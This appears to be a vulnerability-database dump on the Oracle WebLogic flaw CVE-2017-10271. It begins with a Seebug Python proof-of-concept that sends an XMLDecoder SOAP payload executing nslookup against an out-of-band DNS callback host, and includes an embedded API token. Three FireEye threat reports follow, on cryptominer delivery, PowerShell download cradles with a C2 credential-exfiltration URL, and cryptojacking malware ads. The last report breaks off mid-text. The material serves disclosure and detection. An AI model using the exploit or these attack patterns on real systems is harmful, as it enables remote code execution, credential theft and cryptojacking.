WebLogic\u7684\u4f7f\u7528\u9762\u8f83\u4e3a\u5e7f\u6cdb\uff0c\u653b\u51fb\u9762\u6d89\u53ca\u5404\u4e2a\u884c\u4e1a\u3002\u6b64\u6b21\u653b\u51fb\u4e2d\u4f7f\u7528\u7684\u6728\u9a6c\u4e3a\u5178\u578b\u7684\u6bd4\u7279\u5e01\u6316\u77ff\u6728\u9a6c\u3002\u4f46\u8be5\u6f0f\u6d1e\u53ef\u88ab\u9ed1\u5ba2\u7528\u4e8e\u5176\u5b83\u76ee\u7684\u653b\u51fb\u3002\r\n \r\n### \u5f71\u54cd\u7248\u672c\r\n\r\n* Oracle Weblogic Server 10.3.6.0\r\n\r\n* Oracle Weblogic Server 12.2.1.2\r\n\r\n* Oracle Weblogic Server 12.2.1.1\r\n\r\n* Oracle Weblogic Server 12.1.3.0", "published": "2017-12-22T00:00:00", "type": "seebug", "title": "Oracle WebLogic wls-wsat RCE(CVE-2017-10271)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-10271", "CVE-2017-3248"], "modified": "2017-12-22T00:00:00", "id": "SSV:97009", "href": "https://www.seebug.org/vuldb/ssvid-97009", "sourceData": "\n #!/usr/bin/env python\r\n# coding: utf-8\r\nimport random\r\nimport string\r\nimport urlparse\r\nimport time\r\n\r\nfrom pocsuite.api.request import req\r\nfrom pocsuite.api.poc import register\r\nfrom pocsuite.api.poc import Output, POCBase\r\nfrom 
pocsuite.lib.core.data import logger\r\n\r\n\r\nclass TestPOC(POCBase):\r\n vulID = '97009'\r\n version = '1'\r\n author = ''\r\n vulDate = '2017-10-23'\r\n createDate = '2017-12-22'\r\n updateDate = '2017-12-22'\r\n references = [\r\n 'https://www.seebug.org/vuldb/ssvid-97009',\r\n ]\r\n name = 'Oracle WebLogic wls-wsat RCE(CVE-2017-10271)'\r\n appPowerLink = 'https://www.oracle.com/middleware/weblogic/index.html'\r\n appName = 'WebLogic'\r\n appVersion = ''\r\n vulType = 'Remote Command Execution'\r\n desc = '''\r\n Oracle Fusion Middleware\uff08Oracle\u878d\u5408\u4e2d\u95f4\u4ef6\uff09\u662f\u7f8e\u56fd\u7532\u9aa8\u6587\uff08Oracle\uff09\u516c\u53f8\u7684\u4e00\u5957\u9762\u5411\u4f01\u4e1a\u548c\u4e91\u73af\u5883\u7684\u4e1a\u52a1\u521b\u65b0\u5e73\u53f0\u3002\u8be5\u5e73\u53f0\u63d0\u4f9b\u4e86\u4e2d\u95f4\u4ef6\u3001\u8f6f\u4ef6\u96c6\u5408\u7b49\u529f\u80fd\u3002Oracle WebLogic Server\u662f\u5176\u4e2d\u7684\u4e00\u4e2a\u9002\u7528\u4e8e\u4e91\u73af\u5883\u548c\u4f20\u7edf\u73af\u5883\u7684\u5e94\u7528\u670d\u52a1\u5668\u7ec4\u4ef6\u3002\r\nOracle Fusion Middleware\u4e2d\u7684Oracle WebLogic Server\u7ec4\u4ef6\u7684WLS Security\u5b50\u7ec4\u4ef6\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u63a7\u5236\u7ec4\u4ef6\uff0c\u5f71\u54cd\u6570\u636e\u7684\u53ef\u7528\u6027\u3001\u4fdd\u5bc6\u6027\u548c\u5b8c\u6574\u6027\u3002\u4ee5\u4e0b\u7ec4\u7248\u672c\u53d7\u5230\u5f71\u54cd\uff1aOracle WebLogic Server 10.3.6.0.0\u7248\u672c\uff0c12.1.3.0.0\u7248\u672c\uff0c12.2.1.1.0\u7248\u672c\uff0c12.2.1.2.0\u7248\u672c\u3002\r\n\r\n '''\r\n\r\n samples = []\r\n\r\n def verify_request(self, token, type, flag):\r\n retVal = False\r\n counts = 3\r\n url = \"http://api.ceye.io/v1/records?token={token}&type={type}&filter={flag}\".format(token=token, type=type, flag=flag)\r\n while counts:\r\n try:\r\n time.sleep(1)\r\n resp = req.get(url)\r\n if resp and resp.status_code == 200 and flag in resp.content:\r\n retVal = True\r\n 
break\r\n except Exception as ex:\r\n logger.warn(ex.message)\r\n time.sleep(1)\r\n\r\n counts -= 1\r\n\r\n return retVal\r\n\r\n\r\n def test_uri(self, uri):\r\n flag = \"\".join(random.choice(string.ascii_letters) for _ in xrange(0, 8))\r\n headers = {\r\n 'SOAPAction': \"\",\r\n 'Content-Type': 'text/xml;charset=UTF-8'\r\n }\r\n path = '/wls-wsat/CoordinatorPortType11'\r\n url = urlparse.urljoin(uri, path)\r\n postdata = \"\"\"\r\n <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \r\n <soapenv:Header> \r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \r\n <java version=\"1.8.0_131\" class=\"java.beans.XMLDecoder\"> \r\n <object class=\"java.lang.ProcessBuilder\"> \r\n <array class=\"java.lang.String\" length=\"2\"> \r\n <void index=\"0\"> \r\n <string>nslookup</string> \r\n </void> \r\n <void index=\"1\"> \r\n <string>{0}.dns.j3170ioc.ceye.io</string> \r\n </void> \r\n </array> \r\n <void method=\"start\"/> \r\n </object> \r\n </java> \r\n </work:WorkContext> \r\n </soapenv:Header> \r\n <soapenv:Body/> \r\n </soapenv:Envelope>\r\n \"\"\".format(flag)\r\n try:\r\n resp = req.post(url, data=postdata, headers=headers)\r\n if resp.status_code == 500 and self.verify_request(token=\"5df9bef9ed0d27df6f8csc1452b99b5b2p\", type=\"dns\", flag=flag):\r\n return True\r\n\r\n except Exception as ex:\r\n logger.warning(ex.message)\r\n return False\r\n\r\n\r\n def _verify(self):\r\n result = {}\r\n pr = urlparse.urlparse(self.url)\r\n ports = [7001]\r\n if pr.port not in ports:\r\n ports.insert(0, pr.port)\r\n for port in ports:\r\n uri = \"{0}://{1}:{2}\".format(pr.scheme, pr.hostname, str(port))\r\n if self.test_uri(uri):\r\n result['VerifyInfo'] = {}\r\n result['VerifyInfo']['URL'] = uri\r\n break\r\n\r\n return self.parse_output(result)\r\n\r\n def _attack(self):\r\n return self._verify()\r\n\r\n def parse_output(self, result):\r\n output = Output(self)\r\n if result:\r\n output.success(result)\r\n else:\r\n 
output.fail('Internet nothing returned')\r\n return output\r\n\r\n\r\n\r\nregister(TestPOC)\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-97009"}], "fireeye": [{"lastseen": "2018-08-31T00:18:23", "bulletinFamily": "info", "cvelist": ["CVE-2017-0144", "CVE-2017-10271"], "description": "#### Introduction\n\nFireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.\n\nCVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.\n\nFireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.\n\nWe saw evidence of organizations located in various countries \u2013 including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical \u2013 being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. 
This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.\n\nThe recent cryptocurrency boom has resulted in a growing number of operations \u2013 employing diverse tactics \u2013 aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.\n\n#### Tactic #1: Delivering the miner directly to a vulnerable server\n\nSome tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim\u2019s system (Figure 1), and executing it using ShellExecute().\n\n \nFigure 1: Downloading the payload directly\n\n#### Tactic #2: Utilizing PowerShell scripts to deliver the miner\n\nOther tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).\n\n \nFigure 2: Exploit delivering PowerShell script\n\nThis script has the following functionalities:\n\n * **Downloading miners from remote servers**\n\n \nFigure 3: Downloading cryptominers\n\nAs shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.\n\n * **Creating scheduled tasks for persistence**\n\n \nFigure 4: Creation of scheduled task\n\n * **Deleting scheduled tasks of other known cryptominers**\n\n \nFigure 5: Deletion of scheduled tasks related to other miners\n\nIn Figure 4, the cryptominer creates a scheduled task with name \u201c_Update service for Oracle products1_\u201d. In Figure 5, a different variant deletes this task and other similar tasks after creating its own, \u201c_Update service for Oracle productsa_\u201d. 
\n\nFrom this, it\u2019s quite clear that different attackers are fighting over the resources available in the system.\n\n * **Killing processes matching certain strings associated with other cryptominers**\n\n \nFigure 6: Terminating processes directly\n\n \nFigure 7: Terminating processes matching certain strings\n\nSimilar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).\n\n * **Connects to mining pools with wallet key**\n\n \nFigure 8: Connection to mining pools\n\nThe miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.\n\n * **Limiting CPU usage to avoid suspicion**\n\n \nFigure 9: Limiting CPU Usage\n\nTo avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).\n\n#### Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue\n\nSome tactics involve spreading laterally across a victim\u2019s environment using dumped Windows credentials and the [EternalBlue](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>) vulnerability ([CVE-2017-0144](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)).\n\nThe malware checks whether it\u2019s running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. 
This variant maintains persistence via WMI (Windows Management Instrumentation).\n\nThe malware also has the capability to perform a [Pass-the-Hash](<https://en.wikipedia.org/wiki/Pass_the_hash>) attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.\n\nAdditionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.\n\nIf the lateral movement with credentials fails, then the malware uses the PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if it\u2019s vulnerable to EternalBlue, and uses it to spread to that host.\n\nAfter all network-derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host.\n\n#### Tactic #4: Scenarios observed in Linux OS\n\nWe\u2019ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.\n\n \nFigure 10: Delivery of shell scripts\n\nThe shell script performs the following activities:\n\n * **Attempts to kill already running cryptominers**\n\n \nFigure 11: Terminating processes matching certain strings\n\n * **Downloads and executes cryptominer malware**\n\n \nFigure 12: Downloading CryptoMiner\n\n * **Creates a cron job to maintain persistence**\n\n \nFigure 13: Cron job for persistence\n\n * **Tries to kill other potential miners to hog the CPU usage**\n\n \nFigure 14: Terminating other potential miners\n\nThe function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.\n\n#### Conclusion\n\nUse of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. 
We\u2019ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.\n\nNotably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits.\n\nFireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.\n\nAt the time of writing, FireEye HX detects this activity with the following indicators:\n\n**Detection Name** \n \n--- \n \nPOWERSHELL DOWNLOADER (METHODOLOGY) \n \nMONERO MINER (METHODOLOGY) \n \nMIMIKATZ (CREDENTIAL STEALER) \n \n#### Indicators of Compromise\n\n**MD5**\n\n| \n\n**Name** \n \n---|--- \n \n3421A769308D39D4E9C7E8CAECAF7FC4\n\n| \n\ncranberry.exe/logic.exe \n \nB3A831BFA590274902C77B6C7D4C31AE\n\n| \n\nxmrig.exe/yam.exe \n \n26404FEDE71F3F713175A3A3CEBC619B\n\n| \n\n1.ps1 \n \nD3D10FAA69A10AC754E3B7DDE9178C22\n\n| \n\n2.ps1 \n \n9C91B5CF6ECED54ABB82D1050C5893F2\n\n| \n\ninfo3.ps1 \n \n3AAD3FABF29F9DF65DCBD0F308FF0FA8\n\n| \n\ninfo6.ps1 \n \n933633F2ACFC5909C83F5C73B6FC97CC\n\n| \n\nlower.css \n \nB47DAF937897043745DF81F32B9D7565\n\n| \n\nlib.css \n \n3542AC729035C0F3DB186DDF2178B6A0\n\n| \n\nbootstrap.css \n \nThanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.\n", "modified": "2018-02-15T11:30:00", "published": "2018-02-15T11:30:00", "id": "FIREEYE:399092589F455855881447C60B56C21A", "href": 
"https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html", "type": "fireeye", "title": "CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:18:22", "bulletinFamily": "info", "cvelist": ["CVE-2017-10271"], "description": "#### Introduction****\n\nCyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to [install backdoors](<https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html>), [execute malicious code](<https://www.csoonline.com/article/3227046/malware/what-is-a-fileless-attack-how-hackers-invade-systems-without-installing-software.html>), and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.\n\nIn this post you will learn:\n\n * Why malicious PowerShell can be challenging to detect with a traditional \u201csignature-based\u201d or \u201crule-based\u201d detection engine.\n * How Natural Language Processing (NLP) can be applied to tackle this challenge.\n * How our NLP model detects malicious PowerShell commands, even if obfuscated.\n * The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.\n\n#### Background****\n\nPowerShell is one of the most [popular tools](<https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html>) used to carry out attacks. 
Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).\n\n \nFigure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 \u2013 blue bars for the number of attacks detected, with the red curve for exponentially smoothed time series\n\nFireEye has been tracking the malicious use of PowerShell for years. In 2014, Mandiant incident response investigators published a Black Hat paper that covers the [tactics, techniques and procedures (TTPs) used in PowerShell attacks](<https://www.blackhat.com/docs/us-14/materials/us-14-Kazanciyan-Investigating-Powershell-Attacks-WP.pdf>), as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to [improve PowerShell logging](<https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html>), which gives greater visibility into potential attacker activity. More recently, our in-depth report on [APT32](<https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html>) highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.\n\n \nFigure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain\n\nLet\u2019s take a deep dive into an example of a malicious PowerShell command (Figure 3).\n\n \nFigure 3: Example of a malicious PowerShell command\n\nThe following is a quick explanation of the [arguments](<https://docs.microsoft.com/en-us/powershell/scripting/powershell-scripting?view=powershell-6>):\n\n * -NoProfile \u2013 indicates that the current user\u2019s profile setup script should not be executed when the PowerShell engine starts.\n * -NonI \u2013 shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.\n * -W Hidden \u2013 shorthand for \u201c-WindowStyle Hidden\u201d, which indicates 
that the PowerShell session window should be started in a hidden manner.\n * -Exec Bypass \u2013 shorthand for \u201c-ExecutionPolicy Bypass\u201d, which disables the execution policy for the current PowerShell session (default disallows execution). It should be noted that the Execution Policy isn\u2019t meant to be a security boundary.\n * -encodedcommand \u2013 indicates the following chunk of text is a base64 encoded command.\n\nWhat is hidden inside the Base64 decoded portion? Figure 4 shows the decoded command.\n\n \nFigure 4: The decoded command for the aforementioned example\n\nInterestingly, the decoded command unveils a stealthy fileless network access and remote content execution!\n\n * _IEX_ is an alias for the _Invoke-Expression_ cmdlet that will execute the command provided on the local machine.\n * **The _new-object_** cmdlet creates an instance of a .NET Framework or COM object, here a _net.webclient_ object.\n * The _downloadstring_ will download the contents from <url> into a memory buffer (which in turn _IEX_ will execute).\n\nIt\u2019s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting [CVE-2017-10271 to deliver a cryptocurrency miner](<https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html>). This attack involved the exploit being leveraged to deliver a PowerShell script, instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.\n\nThere are several reasons why adversaries prefer PowerShell:\n\n 1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.\n 2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.\n 3. 
The flexible PowerShell syntax imposes combinatorial complexity challenges to signature-based detection rules.\n\nAdditionally, from an economics perspective:\n\n * Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with [open source obfuscation tools](<https://www.fireeye.com/blog/threat-research/2017/07/revoke-obfuscation-powershell.html>).\n * Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.\n\nNext, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.\n\n#### Natural Language Processing for Detecting Malicious PowerShell\n\nCan we use machine learning to predict if a PowerShell command is malicious?\n\nOne advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set that comprised malicious commands, as well as benign commands found in enterprise networks.\n\nAfter we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.\n\nOne of the technical challenges we tackled was synonymy, a problem studied in linguistics. For instance, \u201cNOL\u201d, \u201cNOLO\u201d, and \u201cNOLOGO\u201d have identical semantics in PowerShell syntax. 
In NLP, a [stemming](<https://en.wikipedia.org/wiki/Stemming>) algorithm will reduce the word to its original form, such as \u201cInnovating\u201d being stemmed to \u201cInnovate\u201d.\n\nWe created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as a [trie](<https://en.wikipedia.org/wiki/Trie>), as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.\n\n \nFigure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)\n\nThe overall NLP pipeline we developed is captured in the following table:\n\nNLP Key Modules\n\n| \n\nFunctionality \n \n---|--- \n \nDecoder\n\n| \n\nDetect and decode any encoded text \n \nNamed Entity Recognition (NER)\n\n| \n\nDetect and recognize any entities such as IP, URL, Email, Registry key, etc. \n \nTokenizer\n\n| \n\nTokenize the PowerShell command into a list of tokens \n \nStemmer\n\n| \n\nStem tokens into semantically identical tokens, uses trie \n \nVocabulary Vectorizer\n\n| \n\nVectorize the list of tokens into machine learning friendly format \n \nSupervised classifier\n\n| \n\nBinary classification algorithms:\n\n * Kernel Support Vector Machine\n * Gradient Boosted Trees\n * Deep Neural Networks \n \nReasoning\n\n| \n\nThe explanation of why the prediction was made. Enables analysts to validate predictions. 
\n \nThe following are the key steps when streaming the aforementioned example through the NLP pipeline:\n\n * Detect and decode the Base64 commands, if any\n * Recognize entities using Named Entity Recognition (NER), such as the <URL>\n * Tokenize the entire text, including both clear text and obfuscated commands\n * Stem each token, and vectorize them based on the vocabulary\n * Predict the malicious probability using the supervised learning model\n\n \nFigure 6: NLP pipeline that predicts the malicious probability of a PowerShell command\n\nMore importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.\n\n \nFigure 7: End-to-end machine learning production pipeline for PowerShell machine learning\n\n#### Value Validated in the Field\n\nWe successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell attacks, including:\n\n * Commodity malware such as Kovter.\n * Red team penetration test activities.\n * New variants that bypassed legacy signatures, while detected by our machine learning with high probabilistic confidence.\n\nThe unique values brought by the PowerShell machine learning detection engine include: \n\n * The machine learning model automatically learns the malicious patterns from the curated corpus. 
In contrast to traditional detection signature rule engines, which are Boolean expression and regex based, the NLP model has lower operation cost and significantly cuts down the release time of security content.\n * The model performs probabilistic inference on unknown PowerShell commands by the implicitly learned non-linear combinations of certain patterns, which increases the cost for the adversaries to bypass.\n\nThe ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.\n\n#### Acknowledgements\n\nWe would like to acknowledge:\n\n * Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.\n * Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.\n * Research endpoint support from Caleb Madrigal.\n * The FireEye ICE-DS Team.\n", "modified": "2018-07-10T12:00:00", "published": "2018-07-10T12:00:00", "id": "FIREEYE:6B4CFD4290F6444DFC070D828CEC509A", "href": "https://www.fireeye.com/blog/threat-research/2018/07/malicious-powershell-detection-via-machine-learning.html", "type": "fireeye", "title": "Malicious PowerShell Detection via Machine Learning", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:18:22", "bulletinFamily": "info", "cvelist": ["CVE-2016-0099", "CVE-2017-10271"], "description": "#### Introduction\n\nCyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This [interest has increased in recent years](<https://www.fireeye.com/blog/threat-research/2018/04/cryptocurrencies-cyber-crime-blockchain-infrastructure-use.html>), stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. 
Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.\n\nThis blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.\n\n#### What Is Mining?\n\nAs transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into \"blocks\" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the \"chain\" in blockchain. In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called \"pools\" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. 
Figure 1 illustrates the roles miners play in the blockchain network.\n\n \nFigure 1: The role of miners\n\n#### Underground Interest\n\nFireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.\n\n \nFigure 2: Underground keyword mentions\n\n#### Monero Is King\n\nThe majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol, as a fork of Bytecoin. Unlike many cryptocurrencies, Monero uses a unique technology called \"ring signatures,\" which shuffles users' public keys to eliminate the possibility of identifying a particular user, ensuring it is untraceable. Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and are unfeasible to be revealed through blockchain analysis, ensuring that Monero transactions are unable to be linked while also being cryptographically secure.\n\nThe Monero blockchain also uses what's called a \"memory-hard\" hashing algorithm called CryptoNight and, unlike Bitcoin's SHA-256 algorithm, it deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers and allows for CPU mining to remain feasible and profitable. 
Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.\n\n#### Underground Advertisements for Miners\n\nBecause most miner utilities are small, open-sourced tools, many criminals rely on crypters. Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.\n\n**XMR Mining Utilities** \n \n--- \n \nXMR-STACK \n \nMINERGATE \n \nXMRMINER \n \nCCMINER \n \nXMRIG \n \nCLAYMORE \n \nSGMINER \n \nCAST XMR \n \nLUKMINER \n \nCPUMINER-MULTI \n \nTable 1: Commonly used Monero miner utilities\n\nThe following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.\n\n##### Sample Advertisement #1 (Smart Miner + Builder)\n\nIn early April 2018, actor \"Mon\u00a3y\" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD \u2013 payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero \u2013 that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. 
According to the actor, Monero Madness also provides the following features:\n\n * Unlimited builds\n * Builder GUI (Figure 4)\n * Written in AutoIT (no dependencies)\n * FUD\n * Safer error handling\n * Uses most recent XMRig code\n * Customizable pool/port\n * Packed with UPX\n * Works on all Windows OS (32- and 64-bit)\n * Madness Mode option\n\n \nFigure 3: Monero Madness\n\n \nFigure 4: Monero Madness builder\n\n##### Sample Advertisement #2 (Miner + Telegram Bot Builder)\n\nIn March 2018, FireEye iSIGHT Intelligence observed actor \"kent9876\" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:\n\n * Written in C/C++\n * Build size is small (about 100\u2013150 kB)\n * Hides miner process from popular task managers\n * Can run without Administrator privileges (user-mode)\n * Auto-update ability\n * All data encoded with 256-bit key\n * Access to Telegram bot-builder\n * Lifetime support (24/7) via Telegram\n\n \nFigure 5: Goldig Miner advertisement\n\n##### Sample Advertisement #3 (Miner + Credential Stealer)\n\nIn March 2018, FireEye iSIGHT Intelligence observed actor \"TH3FR3D\" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. 
According to the advertisement, the Felix tool boasted the following features:\n\n * Written in C# (Version 1.0.1.0)\n * Browser stealer for all major browsers (cookies, saved passwords, auto-fill)\n * Monero miner (uses minergate.com pool by default, but can be configured)\n * Filezilla stealer\n * Desktop file grabber (.txt and more)\n * Can download and execute files\n * Update ability\n * USB spreader functionality\n * PHP web panel\n\n \nFigure 6: Felix HTTP\n\n##### Sample Advertisement #4 (Miner + RAT)\n\nIn January 2018, FireEye iSIGHT Intelligence observed actor \"ups\" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the [CVE-2016-0099](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-032>) exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for \u20ac200 EUR, or \u20ac325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. 
